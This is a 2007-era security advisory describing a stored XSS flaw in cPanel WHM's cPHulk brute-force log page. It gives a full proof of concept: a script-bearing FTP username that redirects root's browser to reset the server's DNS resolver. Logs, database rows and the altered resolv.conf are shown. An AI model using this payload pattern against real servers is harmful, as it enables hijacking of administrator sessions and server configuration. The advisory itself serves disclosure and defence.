cPanel 11.11.0-CURRENT_16774 - XSS in WHM in /cgi/tweakcphulk.cgi



DESCRIPTION


cphulkd is a daemon which monitors failed login attempts to various services, and prevents logins for a set period of time from IP addresses which have recently failed to authenticate after a set amount of attempts. WHM provides an interface to the root user for viewing the failed login attempts via the "cPHulk Brute Force Protection" link (tweakcphulkd.cgi), part of which displays the username used in the attacks. A remote individual could brute force a service, setting the username to a javascript string. Once the attack was logged by cphulkd, and once root accessed the cphulk link in WHM, that javascript string would be executed by root's browser (assuming javascript is enabled).


[user@host ~]$ telnet example.com 21
Trying 1.2.3.4...
Connected to example.com (1.2.3.4).
Escape character is '^]'.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 13:30. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
USER <script>window.location="https://example.com:2087/scripts2/setupresolvconf3?main=&nameserver1=6.6.6.6"</script>
331 User <script>window.location="https://example.com:2087/scripts2/setupresolvconf3?main=&nameserver1=6.6.6.6"</script> OK. Password required
PASS a
530 Login authentication failed


This is what the syslog looked like:

Sep  5 13:30:19 host pure-ftpd: (?@x.x.x.x) [WARNING] Authentication failed for user
[<script>window.location="https://example.com:2087/scripts2/setupresolvconf3?main=&nameserver1=6.6.6.6"
</script>] 


and this is what the "logins" table from the cphulkd db looked like:

mysql> select * from logins \G
*************************** 1. row ***************************
     USER: <script>window.location="https://example.com:2087/scripts2/setupresolvconf3?main=&nameserver1=6.6.6.6"</script>
       IP: 1.2.3.4
  SERVICE: system
   STATUS: 0
LOGINTIME: 2007-09-05 13:30:19 


Now once root logged into WHM, clicked "Security Center", then clicked the "cPHulk Brute Force Protection" link, this would appear in their browser if they had javascript enabled:

Resolver Setup Step 3
Your resolvers have been setup!

Listed in order they are: 6.6.6.6
Warning: You only specified one resolver! If this dns server fails, your server may not function. You should go back
and specify additional resolvers. 


Now observe the contents of /etc/resolv.conf:

[root@host:~]# cat /etc/resolv.conf
nameserver 6.6.6.6



IMPACT


Remote attackers could potentially cause requests of their choice to be issued to WHM, by root. This includes possibly changing the root password of the server, changing the resolvers in /etc/resolv.conf, and more.